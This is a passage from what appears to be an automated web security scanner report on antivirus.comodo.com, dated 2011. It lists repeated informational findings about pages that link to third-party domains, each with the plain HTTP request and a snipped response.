http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767
http://www.buyertrust.com/
http://www.comodo.tv/
http://www.instantssl.com/

Request

GET /antivirus_download.php?af=1165 HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:04:12 GMT
Content-Type: text/html
Connection: close
Content-Length: 21137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.2. http://antivirus.comodo.com/cis-pro_download.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/cis-pro_download.php

Issue detail

The page was loaded from a URL containing a query string:

http://antivirus.comodo.com/cis-pro_download.php?af=1164

The response contains the following links to other domains:

http://cdn.optimizely.com/js/8018129.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767
http://www.buyertrust.com/
http://www.comodo.tv/
http://www.instantssl.com/

Request

GET /cis-pro_download.php?af=1164 HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:04:14 GMT
Content-Type: text/html
Connection: close
Content-Length: 28667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.3. http://antivirus.comodo.com/click-track/BTTN/SLIDER/AV previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/click-track/BTTN/SLIDER/AV

Issue detail

The page was loaded from a URL containing a query string:

http://antivirus.comodo.com/click-track/BTTN/SLIDER/AV?pagelink=index.php

The response contains the following links to other domains:

http://cdn.optimizely.com/js/8018129.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767
http://www.buyertrust.com/
http://www.comodo.tv/
http://www.instantssl.com/

Request

GET /click-track/BTTN/SLIDER/AV?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:17 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.4. http://antivirus.comodo.com/click-track/BTTN/SLIDER/CompareProductsBestVirus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/click-track/BTTN/SLIDER/CompareProductsBestVirus

Issue detail

The page was loaded from a URL containing a query string:

http://antivirus.comodo.com/click-track/BTTN/SLIDER/CompareProductsBestVirus?pagelink=index.php

The response contains the following links to other domains:

http://cdn.optimizely.com/js/8018129.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767
http://www.buyertrust.com/
http://www.comodo.tv/
http://www.instantssl.com/

Request

GET /click-track/BTTN/SLIDER/CompareProductsBestVirus?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:18 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.5. http://antivirus.comodo.com/click-track/BTTN/SLIDER/LearnMoreCleanPC previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/click-track/BTTN/SLIDER/LearnMoreCleanPC

Issue detail

The page was loaded from a URL containing a query string:

http://antivirus.comodo.com/click-track/BTTN/SLIDER/LearnMoreCleanPC?pagelink=index.php

The response contains the following links to other domains:

http://cdn.optimizely.com/js/8018129.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767
http://www.buyertrust.com/
http://www.comodo.tv/
http://www.instantssl.com/

Request

GET /click-track/BTTN/SLIDER/LearnMoreCleanPC?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:19 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.6. http://antivirus.comodo.com/click-track/EXE/AV previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/click-track/EXE/AV

Issue detail

The page was loaded from a URL containing a query string:

http://antivirus.comodo.com/click-track/EXE/AV?pagelink=index.php

The response contains the following links to other domains:

http://cdn.optimizely.com/js/8018129.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767
http://www.buyertrust.com/
http://www.comodo.tv/
http://www.instantssl.com/

Request

GET /click-track/EXE/AV?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:39 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.7. http://antivirus.comodo.com/click-track/IMAGE/CompareAV previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/click-track/IMAGE/CompareAV

Issue detail

The page was loaded from a URL containing a query string:

http://antivirus.comodo.com/click-track/IMAGE/CompareAV?pagelink=index.php

The response contains the following links to other domains:

http://cdn.optimizely.com/js/8018129.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767
http://www.buyertrust.com/
http://www.comodo.tv/
http://www.instantssl.com/

Request

GET /click-track/IMAGE/CompareAV?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:43 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.8. http://antivirus.comodo.com/click-track/IMAGE/logo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/click-track/IMAGE/logo

Issue detail

The page was loaded from a URL containing a query string:

http://antivirus.comodo.com/click-track/IMAGE/logo?pagelink=Global-Header

The response contains the following links to other domains:

http://cdn.optimizely.com/js/8018129.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767
http://www.buyertrust.com/
http://www.comodo.tv/
http://www.instantssl.com/

Request

GET /click-track/IMAGE/logo?pagelink=Global-Header HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:44 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.9. http://antivirus.comodo.com/click-track/LEAD/CAM/AAV-Buy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/click-track/LEAD/CAM/AAV-Buy

Issue detail

The page was loaded from a URL containing a query string:

http://antivirus.comodo.com/click-track/LEAD/CAM/AAV-Buy?pagelink=index.php

The response contains the following links to other domains:

http://cdn.optimizely.com/js/8018129.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767
http://www.buyertrust.com/
http://www.comodo.tv/
http://www.instantssl.com/

Request

GET /click-track/LEAD/CAM/AAV-Buy?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:22 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.10. http://antivirus.comodo.com/click-track/LEAD/CAM/AAV-Trail previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/click-track/LEAD/CAM/AAV-Trail

Issue detail

The page was loaded from a URL containing a query string:

http://antivirus.comodo.com/click-track/LEAD/CAM/AAV-Trail?pagelink=index.php

The response contains the following links to other domains:

http://cdn.optimizely.com/js/8018129.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767
http://www.buyertrust.com/
http://www.comodo.tv/
http://www.instantssl.com/

Request

GET /click-track/LEAD/CAM/AAV-Trail?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:21 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.11. http://antivirus.comodo.com/click-track/LEAD/CAM/CIS-PRO-Buy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/click-track/LEAD/CAM/CIS-PRO-Buy

Issue detail

The page was loaded from a URL containing a query string:

http://antivirus.comodo.com/click-track/LEAD/CAM/CIS-PRO-Buy?pagelink=index.php

The response contains the following links to other domains:

http://cdn.optimizely.com/js/8018129.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767
http://www.buyertrust.com/
http://www.comodo.tv/
http://www.instantssl.com/

Request

GET /click-track/LEAD/CAM/CIS-PRO-Buy?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:24 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.12. http://antivirus.comodo.com/click-track/LEAD/CAM/CIS-PRO-Trail previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/click-track/LEAD/CAM/CIS-PRO-Trail

Issue detail

The page was loaded from a URL containing a query string:

http://antivirus.comodo.com/click-track/LEAD/CAM/CIS-PRO-Trail?pagelink=index.php

The response contains the following links to other domains:

http://cdn.optimizely.com/js/8018129.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767
http://www.buyertrust.com/
http://www.comodo.tv/
http://www.instantssl.com/

Request

GET /click-track/LEAD/CAM/CIS-PRO-Trail?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:23 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.13. http://antivirus.comodo.com/click-track/LEAD/CAM/SLIDER/CIS-PRO previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/click-track/LEAD/CAM/SLIDER/CIS-PRO

Issue detail

The page was loaded from a URL containing a query string:

http://antivirus.comodo.com/click-track/LEAD/CAM/SLIDER/CIS-PRO?pagelink=index.php

The response contains the following links to other domains:

http://cdn.optimizely.com/js/8018129.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767
http://www.buyertrust.com/
http://www.comodo.tv/
http://www.instantssl.com/

Request

GET /click-track/LEAD/CAM/SLIDER/CIS-PRO?pagelink=index.php HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:20 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.14. http://antivirus.comodo.com/click-track/NAV/BusinessAV previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/click-track/NAV/BusinessAV

Issue detail

The page was loaded from a URL containing a query string:

http://antivirus.comodo.com/click-track/NAV/BusinessAV?pagelink=Global-Header

The response contains the following links to other domains:

http://cdn.optimizely.com/js/8018129.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767
http://www.buyertrust.com/
http://www.comodo.tv/
http://www.instantssl.com/

Request

GET /click-track/NAV/BusinessAV?pagelink=Global-Header HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:48 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.15. http://antivirus.comodo.com/click-track/NAV/CleanMyPC previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/click-track/NAV/CleanMyPC

Issue detail

The page was loaded from a URL containing a query string:

http://antivirus.comodo.com/click-track/NAV/CleanMyPC?pagelink=Global-Header

The response contains the following links to other domains:

http://cdn.optimizely.com/js/8018129.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767
http://www.buyertrust.com/
http://www.comodo.tv/
http://www.instantssl.com/

Request

GET /click-track/NAV/CleanMyPC?pagelink=Global-Header HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:47 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.16. http://antivirus.comodo.com/click-track/NAV/Compare previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/click-track/NAV/Compare

Issue detail

The page was loaded from a URL containing a query string:

http://antivirus.comodo.com/click-track/NAV/Compare?pagelink=Global-Header

The response contains the following links to other domains:

http://cdn.optimizely.com/js/8018129.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767
http://www.buyertrust.com/
http://www.comodo.tv/
http://www.instantssl.com/

Request

GET /click-track/NAV/Compare?pagelink=Global-Header HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.17. http://antivirus.comodo.com/click-track/NAV/Innovation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/click-track/NAV/Innovation

Issue detail

The page was loaded from a URL containing a query string:

http://antivirus.comodo.com/click-track/NAV/Innovation?pagelink=Global-Header

The response contains the following links to other domains:

http://cdn.optimizely.com/js/8018129.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767
http://www.buyertrust.com/
http://www.comodo.tv/
http://www.instantssl.com/

Request

GET /click-track/NAV/Innovation?pagelink=Global-Header HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:46 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
